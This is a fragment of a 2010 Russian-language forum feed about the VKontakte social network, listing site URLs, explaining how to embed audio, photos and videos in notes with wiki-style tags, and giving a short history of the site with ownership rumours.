href="http://web.archive.org/web/200701142...e.ru/top10.php" rel="nofollow" target="_blank">http://web.archive.org/web/200701142...e.ru/top10.php</a><br /><a href="http://web.archive.org/web/200701150...te.ru/help.php" rel="nofollow" target="_blank">http://web.archive.org/web/200701150...te.ru/help.php</a><br /><a href="http://web.archive.org/web/200701150...ontakte.ru/reg" rel="nofollow" target="_blank">http://web.archive.org/web/200701150...ontakte.ru/reg</a><br /><a href="http://web.archive.org/web/200710152...php?page=about" rel="nofollow" target="_blank">http://web.archive.org/web/200710152...php?page=about</a><br /><a href="http://web.archive.org/web/200701150...php?page=about" rel="nofollow" target="_blank">http://web.archive.org/web/200701150...php?page=about</a></p> <p>Остальное<br /><a href="http://vkontakte.ru/infested_ip_list.html" rel="nofollow" target="_blank">http://vkontakte.ru/infested_ip_list.html</a><br />Техническая поддержка<br /><a href="http://vkontakte.ru/confirm.php" rel="nofollow" target="_blank">http://vkontakte.ru/confirm.php</a><br /><a href="http://vkontakte.ru/confirm.php?code=32579499a5bdc63..." rel="nofollow" target="_blank">http://vkontakte.ru/confirm.php?code=32579499a5bdc63...</a><br /><a href="http://vkontakte.ru/feed.php" rel="nofollow" target="_blank">http://vkontakte.ru/feed.php</a><br /><a href="http://vkontakte.ru/feed2.php" rel="nofollow" target="_blank">http://vkontakte.ru/feed2.php</a><br /><a href="http://vkontakte.ru/upload.php" rel="nofollow" target="_blank">http://vkontakte.ru/upload.php</a><br /><a href="http://vkontakte.ru/select.php" rel="nofollow" target="_blank">http://vkontakte.ru/select.php</a><br /><a href="http://vkontakte.ru/config.php" rel="nofollow" target="_blank">http://vkontakte.ru/config.php</a><br /><a href="http://vkontakte.ru/translate.php" rel="nofollow" target="_blank">http://vkontakte.ru/translate.php</a><br /><a href="http://vkontakte.ru/help.php?page=warning" rel="nofollow" target="_blank">http://vkontakte.ru/help.php?page=warning</a><br /><a href="http://vkontakte.ru/help.php?page=contest" rel="nofollow" target="_blank">http://vkontakte.ru/help.php?page=contest</a><br /><a href="http://vkontakte.ru/help.php?page=privacy" rel="nofollow" target="_blank">http://vkontakte.ru/help.php?page=privacy</a><br /><a href="http://vkontakte.ru/125upload.php" rel="nofollow" target="_blank">http://vkontakte.ru/125upload.php</a></p> <p>Добавлено через 5 часов 8 минут<br />И ещё:</p> <p>1. Для того чтобы вставить песню в заметку нам нужны два параметра: номер песни, данный при загрузке и id загрузившего чел-ка. Посмотреть их можно в исходном коде страницы (Ctrl+u или щелчок правой кнопкой мыши на странице с аудио, из появившегося списка «Исходный код страницы»). В коде нужно найти строчки содержащие название песни. Советую воспользоваться поиском – Ctrl +f. Внимание! Поиск должен быть или только по названию или только по автору. И так, предположим перед нами код вида (см. чуть выше найденного названия): &lt;table style=&quot;width:575px&quot; style='margin-left:10px;'&gt;&lt;tbody&gt; &lt;tr&gt;&lt;td style=&quot;width: 18px; vertical-align:top&quot;&gt; &lt;img class=&quot;playimg&quot; onclick=&quot;return operate(41470565,1553,8358362,'86282137c7',230);&quot; id=&quot;imgbutton41470565&quot; nosorthandle=&quot;true&quot; src=&quot;images/play.gif&quot;/&gt;. То, что идет в скобках после return operate, мы можем использовать. Затем в заметках пишем [[audio, потом без пробела ваш айди ( или id другого человека, далее, ставим после этой ерунды нижнее подчеркивание и дописываем число, которое идет первое в скобках, закрываем двойные квадратные скобки. Следите, чтобы не было нигде пробелов, а то работать не будет. Выглядит это примерно так [[аudio8358362_41470565]]. На самом деле, все не так запарно, как кажется</p> <p>2. Вот ещё проще способ:<br />жмём на странице где нужный трек ctrl+u<br />потом ctrl+f<br />в поиске вводим название трека<br />дальше ищите такую строку:{act:'a_add',add:1,gid:0,aid:58141834,oid:9 121137,hash:.......<br />и вырезать оттуда числа идущие после oid и aid<br />[[audio&quot;число после oid&quot;_&quot;число идущее после aid&quot;]]</p> <p>в итоге в заметку вставляем данную запись:<br />[[audio9121137_58141834]]</p> <p>из двух новых способов первым нужно пользоваться, когда находишься на страничке каго-либо человека а вторым способом нужно пользоваться, когда находишься в поисковике музыки..))</p> <p>3. Фото, Видео, Люди и Группы в заметках<br />Тут проще. Копируем, то, что находится в адресной строке и вставляем в заметку или копируем только, то, что идет после последнего слеша и заключаем в двойные квадратные скобки. Все. Будет отображаться как надо.<br />Например: <br />[[photoxxxx_xxxxx]] xxxx - ну ясно что<br />[[videoxx_xxxxxx]] xxxx - ну понятно что это=)<br />[[idxxxxx]] xxxxx - id человека =)<br />[[clubxxxxx]] xxxx - номер группы</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 05:47:49 +0300 https://kasper.7li.ru/viewtopic.php?pid=3#p3 https://kasper.7li.ru/viewtopic.php?pid=2#p2 <p>О проекте: В конце 2007 года лидером народного голосования «Премии Рунета -2007», стала известная социальная интернет-сеть В Контакте.Ру. Этот проект помогая пользователям рунета поддерживать связь друг с другом, стал первым по посещаемости из русских порталов, обогнав такие проекты как поисковые сервисы «Яндекс», «Rambler», социальную сеть «Odnoklassniki.ru», «Mail.ru». В отличии от портала «Odnoklassniki.ru», в котором основными участниками являются люди среднего и старшего возрастов, vkontakte .ru общаются в основном, школьники и студенты. Портал удобен для создания различных групп, оформлении личного пространства, добавления фото и видеофайлов. <br />Доподлинно не известно, кто является настоящим владельцем портала. Юридически хозяин – ООО «В Контакте». В СМИ проскальзывала информация о том, что 60% проекта владеет Вячеслав Мирилашвили. Создателями и совладельцами сайта также по слухам являются братья Николай и Павел Дуровы. Если опираться на слухи, то такая скрытность объясняется тем, что сайт ВКонтакте.Ру – проект Федеральной Службы Безопасности. Стоит отметить, что такие же слухи распространяются и о сети Odnoklassniki.ru. <br />Интересен факт, что первый случай эпидемии компьютерного вируса, распространяющийся через социальные сети, связан как раз с порталом vkontakte. Несколько сотен тысяч пользователей сайта одновременно получили послание от несуществующего персонажа, которое было заражено компьютерным вирусом. Сегодня специалисты портала рекомендуют участникам проекта проверять компьютер на наличие вирусов после просмотра изображений на портале. </p> <p>Примечательно, что за всю историю существования проекта, социальная сеть ВКонтакте.ру ни разу не согласилась на предложение о инвестициях со стороны. Официальная причина отказов – проект создан исключительно ради людей, желающих общаться, и у владельцев сайта никогда не было цели перепродать проект. Но, факт в том, что при таком большом количестве посещений доходы социальной сети минимальны. Но такая ситуация наблюдается не только у портала ВКонтакте.Ру - ни одна из аналогичных социальных сетей не научилась зарабатывать на своем трафике. Тем не менее, свою основную задачу ВКонтакте выполняет с успехом – миллионы посетителей находят здесь прекрасную возможность общаться со старыми товарищами и приобретать новых друзей.</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 05:46:02 +0300 https://kasper.7li.ru/viewtopic.php?pid=2#p2